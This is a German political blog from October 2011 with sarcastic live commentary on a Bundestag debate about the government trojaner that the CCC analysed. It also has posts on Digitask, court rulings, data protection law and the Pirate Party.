Jetzt ein Herr Höferlin von der FDP, der mir ja nichts sagt, und der greift erstmal so richtig tief ins Klo mit einem saftigen "also WIR haben ja ZUERST mit dem CCC ein Treffen gemacht". Ooooh wie peinlich. Ansonsten erwähnt er, dass Skype auch ohne Trojaner abgehört werden kann, und schließt mit "Wir werden das gemeinsam mit den Freunden von der Union lösen".
Jetzt noch ein Herr Schuster von der CDU. Verteidigt sich ausdrücklich gegen "Parteien, die sich schon im Bundestag wähnen" (und er meint glaube ich die Piraten, nicht die FDP damit :-] ). Ein sehr undynamischer Redner, klingt wie ein Jurist. *gähn*
Sagt ausdrücklich, dass keiner irgendwelche illegale Software einsetzt, dass das BKA alles dokumentiert, und dass es auch noch keine unabhängigen Prüfungen gibt, die die CCC-Ergebnisse bestätigen. Versucht wieder den Talking Point, dass es ja nur darauf ankommt, auf welche Knöpfe die Polizisten tatsächlich klicken, und nicht was die Software für Funktionen hat. Alles andere sei ein "Misstrauensverdacht" gegen die Polizistinnen und Polizisten!1!! Ich halt's nicht aus. Wo haben sie DEN denn ausgegraben? "Der CCC ist keine institutionelle Referenz in diesem Lande". Will auch ein zentrales Kompetenzzentrum einrichten. Ich begrüße das ja, dass die CDU Kompetenz einführen will. Das hätten sie schon vor 40 Jahren machen sollen. Sein Schlussplädoyer klang für mich nach "Wir haben euch doch alle lieb!"
Update: Uhl hat noch ein Money Quote rausgehauen, das ich aber nicht klar genug verstanden hatte, um es zu zitieren. Aber es gibt ein Video davon:
Das Land wird von Sicherheitsbehörden geleitet, die sehr behutsam mit dem sensiblen Instrument der Quellen-TKÜ umgeht, und so soll es auch sein.
Es wäre schlimm, wenn unser Land am Schluss regiert werden würde von Piraten und Chaoten aus dem Computerclub.
Es wird regiert von Sicherheitsbeamten, die dem Recht und dem Gesetz verpflichtet sind.
Na wenn das so ist, Herr Uhl.
[l] Frank und ich haben gerade einen Wettpool aufgemacht, dass der Friedrich nicht an der aktuellen Stunde teilnehmen können wird. Wir sind uns noch nicht einig, ob sie das mit Verweis auf die "angespannte Sicherheitslage" oder den Terrorismus oder andere dringliche Dinge tun werden.
Oder vielleicht kommt er auch und sie geben ihm dann nur das Mikrofon nicht. Ich glaube aber eher, dass er gar nicht kommt. Das können die nicht riskieren, dass der wieder in die Nähe eines Mikrofons kommt und sich noch mehr um Kopf und Kragen redet.
Ich weiß nicht, ob euch das schon aufgefallen ist, aber den Ziercke halten sie ja auch gerade unter Verschluss :-)
[l] So, geht endlich los. Den Stream gibt es hier. Es geht schon mal mit einem echten Kracher los: Wir wissen von nichts, haben keine über die Presseberichterstattung hinausgehenden Erkenntnisse, die Verantwortung trägt die einsetzende Stelle. Sagte Dr. Ole Schröder.
Eine Frage war, wenn sie den Quellcode nicht haben, woher sie dann wissen können, dass sie keine Gesetze verletzt haben. Antwort: Naja, der CCC hat ja den Quellcode auch nicht und kann das trotzdem. *Konfetti*
Und Ströbele zitiert den Geheimdienstkoordinator, der von Nachrichtenagenturen zitiert wurde, dass die Dienste Trojaner mit zu viel Funktionen an die Behörden weitergegeben hätten. Das, so die Antwort, sei nicht der Fall.
Eine Frage nach den Screenshots wird so beantwortet, dass die Polizei sich da nach dem Richter richtet. Mit anderen Worten: nicht wir sind Schuld, die Richter sind Schuld. Vielleicht hilft das ja doch mal, um in den Richtern die Erkenntnis reifen zu lassen, dass sie vielleicht mehr tun sollten als bloß alle Anträge zu unterschreiben.
Noch eine großartige Frage: die Richter unterschreiben ja bloß die Anträge der Staatsanwaltschaften, und das hieße ja, dass die Staatsanwaltschaften die illegalen Funktionen angefragt hätten, nicht die Richter sie aus blauem Himmel heraus das verfügen. Die Antwort war irgendein belangloser Ausweich-Blah.
Nächste Ansage: sie haben die Software selbst überprüft, um den Anforderungen zu genügen.
Oh yes, jetzt sagen sie gerade an, dass die Behörden selbstverständlich volle Kontrolle hatten über die Software und das auch revisionssicher protokolliert haben. Ich glaube für uns alle zu sprechen, wenn ich sage, dass wir sehen wollen :-)
Jetzt kommt eine Frage zu Rechtshilfeersuchen anderer Länder unter Erwähnung der Schweiz. "Kann ich Ihnen nicht sagen".
"Wie bewerten Sie denn die Aussage eines Kollegen von Ihnen im Rechtsausschuss, dass man das ohne Quellcode gar nicht sagen kann?" "Im Gegensatz zu Ihnen war ich beim Innenausschuss dabei und da ist das nicht gefragt worden." *schenkelklopf* "Ich muss darauf beharren, dass genau das ein Kollege Ihres Hauses im Rechtsausschuss gesagt hat" (sagt ein anderer) POPCORN!!! Und der legt gleich nochmal nach, dass der CCC ja selber gesagt hat, dass er die Analyse überhaupt nur machen konnte, weil der so miserabel programmiert worden war. Die Stammel-Antwort hat wieder was mit revisionssicherer Dokumentation zu tun. Was für ein Blutbad. Ganz großes Tennis!
"Ich muss nochmal nachfragen: Die Bundesregierung hält es nicht für nötig, den Quellcode für diese Software zu haben?" Antwort wieder Blah mit Revisionsfester Dokumentation. Im Grunde kann man sich die Antworten auch sparen und muss nur die Fragen anhören. :-)
Jetzt weist der Schröder darauf hin, dass sie ja geguckt hätten, ob ihre Version auch die vom CCC angeprangerten Lücken habe, und das sei nicht so. Ich glaub kein Wort. Oh und jetzt zählt er auf, was sie geguckt haben, und zwar haben sie nach Code für die Kamera-Funktion gesucht. Der Punkt des CCC war, dass man diese Funktion über die Nachlade-Funktion nachladen kann. Sie hätten wenigstens mal vorher lesen können.
Auf die Frage nach der Rechtsauffassung der Bundesbehörden zum Thema Screenshots kommt, dass sie das nie beantragt hätten.
Jetzt fragt ein Informatiker der SPD (nein, wirklich!), wie die denn ohne Quellcodeeinsicht ausschließen können, dass da weitere Funktionen drin sind. Antwort: "Das hat das BKA im Versuchslabor geguckt.
Ich frage mich ja, was dieser Dr Ole Schröder getan hat, damit sie ihn da jetzt alleine mit der Arschkarte in der Hand hingestellt haben. Fremdschämen++
Auf die Frage, warum sie denn nicht nur selbstgeschrieben Software einsetzen, kommt die Antwort, dass sie das ja bei der Online-Durchsuchung so halten, aber da gäbe es ja immer noch "haltlose Anschuldigungen".
Oh hier noch ein Highlight: Angesprochen auf Exporte von Überwachungstechnologie an Drittstaaten sagt der Schröder, diese Firmen würden ja alle vom Wirtschaftsministerium sicherheitsgeprüft, damit das keine Gefahr darstellt. Au weia, der ist ja nicht mal rudimentär gebrieft worden!
Auf nochmalige Nachfrage kommt dann die Ansage, dass sie ja auch nicht ausschließen können, dass nicht mehr geliefert wird als bestellt wurde. Und im Übrigen war die Anschaffung von Digitask-Software ja vor seiner Amtszeit.
Oh jetzt geben sie zu, den Brandenburgern in Amtshilfe "technische Unterstützung" der Zollbehörden gegeben zu haben, konkret haben sie nichts angeschafft sondern denen einen Trojaner ausgeliehen / gegeben.
Es ist auffällig, wie leer das da ist, trotz so eines Hammerthemas. Die fragen zwar alle fleißig nach und wadenbeißen schön, aber irgendwie hätte ich doch gedacht, dass sich da ein paar mehr Abgeordnete Zeit für nehmen.
Jetzt erzählt der Typ gerade, man könne den Trojaner nicht einfach so um weitere Module "aufladen", denn da brauche man ja Authentifizierung für (eine dreiste Lüge). Aber für Updates müssen Updates eingespielt werden, wenn z.B. Skype geupdated wird (das ist auch eine dreiste Lüge), und im Übrigen sei das ja auch deshalb um dem Bundesverfassungsgericht zu genügen, denn die hätten ja gesagt, so eine Maßnahme müsse am Stück stattfinden (das ist m.W. auch eine dreiste Lüge).
Jetzt fragt Ströbele, ob der BND mal fiese Trojaner im Ausland eingesetzt hat. Ja, das schließt er aus. Ich glaube kein Wort. Mal sehen, was im Protokoll steht.
HAHAHAHA der Informatik nochmal: wenn Sie das ohne Quellcode ausschließen konnten, haben Sie Zugriff auf bisher der Computerwissenschaft nicht bekannte Verfahren. Teilen Sie die bitte auch mit den Unis? *gacker*
Oh und jetzt fragt endlich jemand, warum sie eigentlich Skype nicht ohne Trojaner abhören wie andere Länder. Antwort: "Selbstverständlich haben wir das geprüft. Die Aussage, dass das auch ohne Quellen-TKÜ geht, ist schlicht falsch". Der redet sich um Kopf und Kragen.
Jetzt fragt einer, ob sie in Zukunft auch noch bei Digitask kaufen wollen. Und was das für die Arbeit der Behörden heißt, wenn sie nicht auf eine brauchbare Software verfügen. Antwort: wir prüfen das.
NEIN! Jetzt sagt er gerade an, dass sie keine Aussage treffen können über den vom CCC geprüften Trojaner, weil sie keine Erkenntnisse über die Software haben. Komisch, eben konnten sie noch ohne Quellcode Aussagen treffen. Das ist ja zum Brüllen komisch! Da zahlt man doch gerne Steuern, wenn man da so viel Unterhaltung für geboten kriegt.
"Die Bundesregierung ist der Meinung, dass wir eine klare rechtliche Grundlage [für die Quellen-TKÜ] haben, die vom Verfassungsgericht noch konkretisiert wurde."
"Mit dem Bundesjustizministerium sind wir ständig in guten Gesprächen." *harrharrharr*
Jetzt kommt der Edathy und wadenbeißt herum, ob die Bundesregierung das wie Bayern sieht, dass das ja eine Meinung des LG gäbe und eine Meinung der Regierung, oder ob man die Ansage des Verfassungsgerichtes als verbindlich ansieht. Antwort: "wir machen keine Screenshots, also erübrigt sich die Frage."
Die Grünen haben heute Boden gutgemacht mit ihren Fragen, finde ich.
Schönes Jerzy Montag-Zitat: "Das war ja eine sehr interessante Antwort, aber leider nicht die auf meine Frage" :-)
Schönes Oppermann-Zitat: "Es ist ja schonmal ein Fortschritt, dass die Bundesregierung die Entscheidungen der Gerichte respektiert."
Es kommt wiederholt die Ansage, dass das Justizministerium den Einsatz von Trojanern verbietet, und daher das Behörden die Ergebnisse ihrer Trojaner-Erkenntnisse immer erst so spät wie möglich an die Bundesanwälte weiterleiten, weil sie dann immer den Trojanereinsatz abbrechen müssen. Das muss intern alles großartiges Popcornkino sein bei denen.
Oh sehr schön, jetzt argumentiert der Beck gerade, dass Internet-Telefonie ja eigentlich einen höheren Schutzwert haben sollte als normale Telefonie, weil man da ja auch Kameras benutzt und Videos überträgt.
Der PSts von Schäuble sagt gerade an, dass das Zollkriminalamt die Funktion des Trojaners nicht ändern kann. Die Antwort war vorgelesen, insofern nahm ich erstmal nicht an, dass der sich verplappert hat, aber danach hat er repressiv als repräsentativ vorgelesen, insofern war das vielleicht doch verplappert. "Digitask ist aus unserer Sicht ein marktführendes […] Unternehmen", sie setzen noch heute deren Software ein sagte er gerade. Woher sie wissen, dass die Software nur genau das kann, was sie bestellt haben, konnte er auch nicht wirklich beantworten. Und laut Jerzy Montag haben die auch schon angegeben, dass sie keinen Quellcode gekriegt haben. Oh und auf die Frage, wieso sie bei Digitask einkaufen, nach dem Korruptionsdingens da damals, meint er, das sei ja ein völlig anderes Unternehmen, Digitask sei ja eine Neugründung. Ich hatte das so in Erinnerung, dass das damals der CEO war. Der Zoll sagt jetzt an, dass der ausgeschieden sei und rechtlich nichts mehr zu tun hatte. Komisch, ich dachte der ist da auch jetzt wieder CEO. Jedenfalls findet der Zoll die Firma Digitask vertrauenswürdig genug, um ihnen den Funktionsumfang der Software schlicht zu glauben. Die seien ja auch sicherheitsgeprüft und so.
Oh und jetzt geht es um den Trojaner in Bayern, der wieland fragt. Der Zoll dementiert, dass das ihr Trojaner war. Den hat das LKA Bayern installiert, der Zoll war kaum, also im Grunde so gut wie gar nicht (!!1!) beteiligt. Auf die Frage, ob man jetzt nach Flughafen-Zollkontrollen immer sein Laptop nach Trojanern scannen muss, meint er dann, er sei ja nicht persönlich dabei gewesen m(
Der Zoll hat keine Erkenntnisse, dass bei Zollkontrollen am Flughafen Trojaner von LKAs installiert worden seien (außer dem einen offensichtlich?). Das Zollkriminalamt hat aber in 16 eigenen Ermittlungen Trojaner beantragt und es gab 19 Einsätze.
Ströbele will noch wissen, wo er als Bundestagsabgeordneter nachgucken muss nach Flughafen-Kontrollen, damit er weiß, dass da kein Trojaner installiert wurde. Der Zoll weicht aus und verweist darauf, dass das jeweilige LKA das ja nur nach richterlichem Beschluss machen darf.
Oh übrigens, dieser Ole Schröder ist der Ehemann von Kristina "Andere schwärmten für Pferde, ich für Kohl" Köhler (jetzt Schröder).

Sun Oct 16 2011

[l] Wisst ihr, welche Partei seit der letzten Sonntagsfrage nicht zulegen konnte? Kommt ihr NIE drauf!
Während die Piraten still stehen, hat die FDP einen Prozentpunkt gutgemacht, weil die Leutheusser-Schnarrenberger anständige Pressepräsenz gezeigt hat. Die hat zwar nichts weiter gesagt sondern sich hauptsächlich hinter Wiesel-Worten und Konjunktiven versteckt aber das hat gereicht.

Sat Oct 15 2011

[l] Schleswig-Holstein hat das Datenschutzgesetz geändert, um den Datenschutzbeauftragten abwählbar zu machen. Das ist §35 Absatz 3:
(3) Der Landtag kann die Landesbeauftragte oder den Landesbeauftragten für Datenschutz mit einer Mehrheit von zwei Dritteln seiner Mitglieder abwählen.
Der Thilo Weichert war in der Vergangenheit mehrfach negativ aufgefallen, weil er seine Arbeit gemacht hat. So haben sich die Parteien das natürlich nicht gedacht, als sie den Posten eingerichtet haben. Daher jetzt der Wink mit dem Zaunpfahl: tu was man dir sagt oder wir wählen dich ab.
Die gröbste Farce an der Geschichte ist die Begründung:
[…] Lösung des ULD aus der Fach- und Rechtsaufsicht der LRg und Sicherung der Unabhängigkeit des Landesbeauftragten für den Datenschutz […]
Nee, klar. Das wäre auch meine erste Idee gewesen, wenn es darum geht, den Datenschutzbeauftragten unabhängiger zu machen!1!! (Danke, Lars)
[l] Ist ja schon irgendwie schade, dass wir keine Opposition haben. Sonst hätte jemand dem Friedrich diesen Spinversuch um die Ohren gehauen:
Unsere Beamten halten sich strikt an das, was sie dürfen“, sagte Friedrich der „Frankfurter Allgemeinen Sonntagszeitung“. „Die Behauptung, sie hätten mehr gemacht, ist falsch.“
Das ist ein erbärmlicher Versuch, von der Tatsache abzulenken, dass schon der Einsatz einer solchen Software ein Verfassungsbruch ist, unabhängig davon ob sie auf den Nachladen-Knopf gedrückt haben oder nicht. Und wie transparent er hier versucht, Patriotismuspunkte für die Verteidigung der Polizei einzuheimsen, und deren guten Ruf zum Abdichten der Lecks in seiner Argumentation zu nutzen. Ekelhaft. Wenn wir jemanden hätten, der seinen Job als Opposition ernst nimmt, würde er dafür ordentlich Feuer unter dem Hintern kriegen.
Und dass er die Malware-Installationsfunktion auch noch verteidigt, spätestens dafür muss er mit Rücktrittsforderungen abgestraft werden. Das darf sich ein Innenminister nicht leisten, und der Friedrich ist auch noch Jurist! Das ist völlig unakzeptabel. Wo bleibt der Aufschrei? Der ist untragbar und muss da weg.
Oh und auch die Leutheusser-Schnarrenberger ist mir zu zurückhaltend gerade.
„Wenn eine Überwachungssoftware das Nachladen von Funktionen ermöglicht, kann die Telefonüberwachung zur Online-Durchsuchung mutieren, für die rechtlich ganz andere Maßstäbe gelten“, sagte Frau Leutheusser-Schnarrenberger der Sonntagszeitung.
Was heißt hier "kann"? ~~Die Frau war immerhin damals Mit-Beschwerdeführerin~~ und jetzt kommt hier so ein relativierendes Rumgewiesel?! Hat die FDP immer noch nicht verstanden, dass das ihr letztes verbleibendes Strohhälmchen von einem Thema ist, das sie von der völligen Irrelevanz trennt? Worauf nehmen die denn da bitte noch Rücksicht?
Update: Hab ich verwechselt, die war Beschwerdeführerin bei der Vorratsdatenspeicherung, nicht beim Bundestrojaner.
[l] OK, ich denke ich gebe dann mal vollständig auf mit den Piraten. Anstatt auch nur eine Sekunde anzuhalten und zu reflektieren, kommen jetzt hier die Kellerkinder mit so unglaublich debilen Ausreden, dass ich meinen eigenen IQ beim Lesen sinken fühlen kann.
Einer meint, die Piraten leben das ja seit Jahren, was der Altmaier jetzt schreibt.
KEINE SAU INTERESSIERT WAS IHR LEBT. Es geht um die Zukunft, nicht eure Vergangenheit! Eure Vergangenheit interessiert nur Leute, die euch eh schon gewählt haben.
Ein anderer meint, die Piraten hättem dem Altmaier erst Twitter gezeigt. ES GEHT DOCH NICHT UM TWITTER! Es geht darum, ein Thema zu besetzen, klare Ansagen zu machen, und dabei die Leute mitzunehmen. Mit ein paar Sätzen zu zeigen, dass man verstanden hat. Genau niemand interessiert sich für "haben wir ja schon immer gesagt". Jaja, ihr habt schon Bluescreens gehabt, als Altmaier noch Fax benutzte. Ist noch nicht bei euch angekommen, dass Hipster-Gehabe unsympathisch und unbeliebt ist? Keiner will das hören!
Ich als Wähler will Entwicklung sehen, nicht Rechthaberei. Keine Sau will hören, was ihr alles schon immer gesagt habt. Die Leute wollen sehen, dass ihr euch Gedanken gemacht habt. Habt ihr aber nicht.
Dass ihr reflektiert habt. Habt ihr aber nicht.
Die Leute wollen sehen, dass ihr euch überlegt habt, wie es jetzt weitergehen soll. Habt ihr aber nicht.
Der Altmaier hat euch gerade mit einer geradezu bestürzenden Leichtigkeit ausmanövriert. Wir reden hier schließlich von den Konservativen, die sonst nichtmal eine Autobahnbrücke ausmanövrieren können.
Aber hey, ist ja eh zuende mit den Piraten: Die ach so transparenten Piraten haben einen bekannten Troll wegen zu großer Transparenz von ihrer Pressemailingliste geworfen. Großartige Zersetzungsmaßnahme. Da kann es nur Gewinner geben. Dieser Troll hat eins aufs Maul gekriegt, das ist aus meiner Sicht ein klarer Sieg, und die Piraten haben gezeigt, wie ernst man ihr Transparenzgefasel nehmen kann, das ist auch ein klarer Sieg. Das hätte die Zersetzungsabteilung eines Geheimdienstes nicht besser orchestrieren können.
Update: "Dem Fefe kann man es halt nicht recht machen". OHHHH DIE SCHMERZEN.
Update: Das "DU DEPP" zieh ich zurück und bitte um Entschuldigung. Das hilft der Diskussion nicht weiter.

Fri Oct 14 2011

[l] Wir brauchen mal Hilfe von Politikern in Niedersachsen. Ihr werdet ja gestern gehört haben, wie Andreas gestern abend in der Phoenix-Runde den Schünemann mit der Frage blamiert hat, ob sie wirklich ihre Überwachungstechnologie bei Syborg kaufen (Achtung: ted-Links muss man manchmal zweimal probieren), die zu der israelischen Firma Verint gehören. Die ganze gruselige Geschichte hinter israelischen Datenverarbeitungs-Outsourcern im Telco-Umfeld könnt ihr hier nachlesen. Wenn man da ein bisschen sucht, findet man bestimmt auch was in der Mainstream-Presse, ich erinnere mich da dunkel, dass es sogar von Fox News Clips auf Youtube gab. Ich bloggte auch schon gelegentlich was, der eigentliche Vorgang, bei dem sie in den USA aufgeflogen waren, war jedoch vor der Eröffnung dieses Blogs, daher keine Liveberichterstattung.
Warum wir jetzt Hilfe brauchen: Andreas sprach das an, und Schünemann dementierte schlicht. Nein, nein, sie hätten nicht bei Syborg gekauft, gestern noch habe er den Namen des Zulieferers gehört aber jetzt kann er sich nicht mehr erinnern. Da muss jetzt dringend jemand nachhaken und eine parlamentarische Anfrage stellen. Wenn jemand das hier mitliest, der im niedersächsischen Parlament sitzt, oder der so jemanden kennt: jetzt ist eure Gelegenheit, etwas beizutragen. Wir wollen bitte wissen, wann und von wem Niedersachsen ihre Trojaner gekauft hat, wie oft und vom wem die jeweils eingesetzt wurden, wer die Qualitätssicherung gemacht hat, wie sie sich vergewissert haben, dass kein Mißbrauch möglich ist, und dass die Trojaner den Anforderungen des Verfassungsgerichts entsprochen haben, und auf welcher Rechtsgrundlage sie die eingesetzt haben. Und wir möchten gerne wissen, wenn es um das Skype-Abhören ging, wieso sie nicht bei Skype nachgefragt sondern einen Trojaner losgeschickt haben. Das muss jetzt möglichst schnell gemacht werden. In diesem Sinne: los, los!
Update: Wird bearbeitet, das ging ja schnell :-)

Thu Oct 13 2011

[l] Lacher am Rande: Der Guardian berichtet, wie das Wall Street Journal trickreich die eigene Auflage hochzumanipulieren versucht hat. Naja, das verwundert jetzt nicht wirklich, immerhin ist das eine Banker-Zeitung (Strike 1) und sie gehört Murdoch (Strike 2). Da wäre wohl eher erstaunlich gewesen, wenn die sich ehrlich und fair verhalten.
Das Verfahren lief angeblich so, dass sie mit großen Firmen Deals gemacht haben. Die Firmen hätten ihnen dann ihr Altpapier für 5¢ pro Ausgabe abgenommen und an Studenten u.ä. verschenkt. Als dann einer der größten Teilnehmer des Programms, ELP, keinen Bock mehr hatte, hätten sie ihnen folgendes angeboten:
On 9 April 2010, Andrew Langhoff emailed ELP to table a new deal, explaining that "our clear goal is to add a new component to our partnership" and offering to "provide a well-branded showcase for ELP's valuable services".
Mit anderen Worten: Werbung. Und sogar ein Deal, dass ELP Umfragen macht, die das Wall Street Journal dann umfänglich zitiert, d.h. eine klare Einflussnahme auf den redaktionellen Teil! Wenn sie das nicht widerlegt kriegen, hat das WSJ als Presse-Publikation vollständig verkackt. Davon kann man sich auch nicht erholen, indem man ein paar Köpfe rollen lässt.
Der Lacher ist aber, dass ELP am Ende wohl nicht zahlen wollte. Dem WSJ kam es auf das Geld gar nicht an, aber wenn ELP nicht zahlt, können sie das auch nicht als verkaufte Auflage zählen. Also soll das WSJ dann Geld zu ELP getunnelt und damit über Bande ihre eigene Auflage gekauft haben. (Danke, Marco)

Wed Oct 12 2011

[l] In diesem Radiointerview redet sich der Bayerische Innenminister Herrmann um Kopf und Kragen. Money Quote:
"Wir haben hier eine unterschiedliche Einschätzung durch das Amtsgericht Landshut und das Landgericht Landshut."
Zu den Screenshots meint er noch:
"Das Landgericht Landshut hat sie für nicht zulässig gehalten, das ist aber nicht das Problem."
Zu der IP in den USA:
"Dass grundsätzlich Daten auch über andere Server geleitet werden, ist ja nichts ungewöhnliches."
Und am Ende meint er auch noch, durch die spätere Beschlagnahme des überwachten Laptops seien die vorher gemachten Screenshots ja "überflüssig". (Danke, Maik)

Tue Oct 11 2011

[l] Ah, "der CCC lügt" scheint die neue Linie der Innenminister zu sein. Auch der Herrmann aus Bayern fängt jetzt damit an.
"Hier werden zum einen Missverständnisse verbreitet und zum anderen vom Chaos Computer Club (CCC) falsche Behauptungen in die Welt gesetzt", sagte Herrmann der Passauer Neuen Presse.
Was für eine Frechheit! Bei so einem Vorwurf würde man ja denken, dass er auch etwas konkretes benennen kann, was wir angeblich falsch gemacht haben sollen, aber da haben seine PR-Berater offensichtlich noch nichts gefunden:
Was der Club konkret falsch gemacht habe, sagte der Minister nicht.
Na super.
Aber wartet, wird noch besser! Ein Money Quote jagt das nächste!
[Unions-Bundestagsfraktionsvize Günter Krings] warf im Gespräch mit der Neuen Osnabrücker Zeitung dem CCC vor, er habe die Sicherheitsbehörden des Bundes leichtfertig unter Generalverdacht gestellt.
Das ist ja großartig! Kann man sich gar nicht ausdenken!
Bisher gebe es keinerlei Belege dafür, dass die analysierte Software tatsächlich illegal eingesetzt worden sei.
Ja, stimmt, so gut wie keine. Bis auf dass das Landgericht Landshut das geurteilt hat. Aber hey, solche unwichtigen Randdetails kann man schonmal durcheinanderbringen.
Krings forderte, der Club solle an der Aufklärung mitwirken und sein Wissen einbringen, um das Internet sicherer zu machen. "Das wäre tatsächlich ein Dienst an unserem Gemeinwesen."
Sehen wir genau so. Deshalb haben wir ja auch gerade eine tiefe Sicherheitslöcher in infizierte PCs reißende Malware aus dem Verkehr gezogen.
Update: Ooooh, das wird ja immer besser! Das Innenministerium von Bayern hat jetzt auch eine Argumentationslinie dafür, wieso das Landgerichtsurteil nicht zählt:
Das Landgericht Landshut entschied im Januar in einem der fünf Fälle, dass das Aufnehmen von Bildschirmfotos rechtswidrig war. Das Landesinnenministerium hingegen argumentiert, dass die Genehmigung auch Bildschirmfotos umfasst - und verweist darauf, dass es dazu noch keine höchstrichterliche Entscheidung gibt.
Mit anderen Worten: Urteile von Landgerichten zählen nicht.
Update: Ein Jurist weist mich gerade auf folgendes hin:
Die Meinung vom Innenministerium ist schon deswegen Bullshit, weil bei solchen Beschlüssen das LG die höchste Instanz *ist* - darüber gibt's nix mehr.
m(

Mon Oct 10 2011

[l] ACH NEE. Das BMI versucht es mit "der CCC hat uns nie Bescheid gegeben". Wir sind ja nun keine Anfänger und haben das daher nicht selbst gemacht, wo dann jetzt Aussage gegen Aussage stünde, sondern wir haben Burkhard Hirsch gebeten, das für uns zu kommunizieren. Den bezichtigt man nicht mal eben der Lüge. Da werden morgen die Fetzen fliegen.
Oh und das Dementi ist wieder überspezifisch (da scheint der ein Faible für zu haben). Lustigerweise ist der Herr Markus Beyer Sprecher des Innenministeriums für die Bereiche […] Krisenmanagement […]. Das nehme ich mal als Kompliment :-)
Wir würden aber schon gerne mal die nächste Seite aus dem Handbuch für Krisenkommunikation sehen. Blättern Sie doch mal um, Herr Beyer!
[l] Einen Lacher am Rande hab ich noch: Uhl fordert die Überwachung der Telekommunikation am Rechner vor ihrer Entschlüsselung. Zur Sicherheit hab ich mal nen Screenshot gemacht.
Falls wer auf dem Schlauch steht: vor der Entschlüsselung sind die Daten noch verschlüsselt, da kann er sie von mir aus gerne überwachen. (Danke, Mike)
[l] Mich weist gerade jemand auf dieses Video hin, wo jemand mal die Staatstrojaner-Sache Großelternkompatibel zu erklärne versucht. Naja, vielleicht nicht Großeltern, aber schonmal nicht schlecht gemacht. Direktlink zum Video.

Sun Oct 9 2011

[l] Liebe Piraten, wir müssen reden. So wird das nix mit der großen Politik. Erst werdet ihr rechtzeitig zum Wahlkampf mit perfektem Timing illegal von der Polizei durchsucht und nutzt es für … eine nicht mal lauwarme Pressemitteilung und sonst gar nichts. Überlegt euch mal, was da eine andere Partei draus gemacht hätte! Es ist ja nicht so, als wäret ihr eine Volkspartei und müsstet bei so einer Gelegenheit auf irgendwelche empfindsamen Randgruppen in eurer Wählerschaft Rücksicht nehmen!
Eine saftigere Einladung, die Strafprozessordnung und die Praxis der leichtfertigen Anordnung von Hausdurchsuchungen und Beschlagnahmen mal grundsätzlich zu thematisieren kann man doch gar nicht geschenkt bekommen. Elfmeter versaut, während der Torwart sich beidhändig in der Nase popelte.
Und nun habt ihr gerade so eine fette Steilvorlage wie den zerlegten und enttarnten Staatstrojaner, und dann vermasselt ihr die auch noch? Da gibt euch die FAZ auch noch die Gelegenheit, mal richtig auf die Kacke zu hauen. Die nutzt man dann doch nicht für so Nullaussagen wie:
Es ist natürlich ein starkes Stück. Aber mit markigen Statements wäre der Sache nicht gedient. Man muss erst einmal die sachlichen Hintergründe aufklären: Von wem wurde der Trojaner wie und wofür eingesetzt? Hier müssen die parlamentarischen Kontrollen greifen.
Jemand zu Hause, McFly? Ich dachte, ihr wolltet die anderen Parteien bei den digitalen Themen vor euch hertreiben? Was glaubt ihr denn, wofür ihr in Berlin gewählt wurdet? Zack, Zack, Kleine Anfrage in den Länderparlamenten organisieren! Wenn das BKA leugnet, wollen wir das für alle LKAs und das Zollkriminalamt auch einmal hören. Bei Larifari-Dementis festbeissen und nachhaken. Der CCC kann fundierte technische Grundlagen bieten, fürs Institutionenwadenbeißen sind doch gerade die Piraten angetreten. Los jetzt, Zwangstranzparenz durchsetzen. Für Geschwurbel wie
Wir werden versuchen, für den nächsten Bundesparteitag Methoden vorzuschlagen, wie man Kontrollinstanzen für das BKA aufbauen könnte. Ob wir das bis dahin schaffen, wird sich zeigen.
brauchen wir keine Piraten, solche Politdarsteller-Wortblasen kriegen wir auch bei den anderen Parteien. Eure Führungsriege wirkt im Moment so weichgespült, dass man sie auch für Junge Union oder Jungliberale halten könnte, wenn man gerade nur den Ton an hat.
Wenn ich sowas lese wie
Ich glaube auch nicht, dass sich das in Wahlergebnissen für die Partei niederschlagen wird.
dann komme ich aus dem Fazialpalmieren gar nicht heraus. WTF? Schlaft ihr da am Steuer? Die Piraten sind die erste Assoziation, die das Volk da draußen hat, wenn sie von Bundestrojaner und Mißbrauch hören! Zack, zack, Vorlagen, Gesetzentwürfe zum Umsetzen der Vorgaben des BVerfG zur digitalen Intimsphäre in Gesetzescode. Und dann in alle Parlamente einbringen, in denen ihr hockt. Worauf wartet ihr? Dass die NPD das tut?
Boah und dann Formulierungen wie diese hier:
Man muss sehen, inwieweit die Leute durch den Vorfall sensibilisiert werden und nicht einfach einen untragbaren Zustand hinnehmen, weil sie ihn nicht richtig einschätzen können. Die Frage ist, ob man die Sache zum Anlass einer politischen Entscheidung macht.
Man muss sehen, ob die Leute sensibilisiert werden?! Habt ihr mal bei Twitter geguckt? Weia. Im CCC in Berlin standen sich die Kamerateams gegenseitig auf den Füssen, im Twitter sind Trojaner-Stichworte pausenlos oben, alle Zeitungen berichten, Platz 2 in der 20-Uhr-Tageschau, Innenminister Friedrich flüchtet nach Afghanistan und ihr fragt euch, ob "die Leute durch den Vorfall sensibilisiert werden"?? Soviel Weltfremde kennt man sonst nur von FDP-Wirtschaftsexperten!
Das ist gerade die Gelegenheit, mal so richtig auf die Kacke zu hauen, radikale Dinge zu fordern, und die etablierten Parteien mit heruntergelassenen Hosen vor euch herzutreiben. Außer faden Parolen und Allgemeinplätzen haben die gerade alle nichts zu bieten, die sind noch im Empörungsheuchelmodus. Es wäre an euch gewesen, da jetzt den Rahmen der Diskussion abzustecken. Tja, verkackt. Wenn ihr so weitermacht, überholt euch noch die Tierschutzpartei mit politischer Professionalität.
Ach ja, und wenn ich das hier lese:
LAUER: Wir sind nicht für den Wilden Westen im Internet.
dann höre ich Hinterkopf "das Internet darf kein rechtsfreier Raum sein". Was soll das werden, die Blümchenweichspülervariante? Leute, Leute, Leute.
Mein Eindruck ist, dass euer Vorstand gerade gemerkt hat, dass die Transparenzforderungen ja auch für sie gelten, und dann machen sie aus Angst, bei einem Fehler beobachtet zu werden, lieber gar nichts. Wenn wir Stagnation wollten, würden wir FDP wählen.
In diesem Sinne. Kriegt mal euren Arsch hoch. Jetzt.

Sat Oct 8 2011

[l] Achtung, aufgepasst, heute gibt es ein besonderes Leckerli. Der CCC kämpft ja schon seit Jahren gegen den Bundestrojaner und die Trojaner der einzelnen Bundesländer und hat bei diversen Gelegenheiten angesagt, dass wenn jemand bei sich einen Bundestrojaner findet, er den doch bitte bei uns abgeben möge, damit wir den sezieren können.
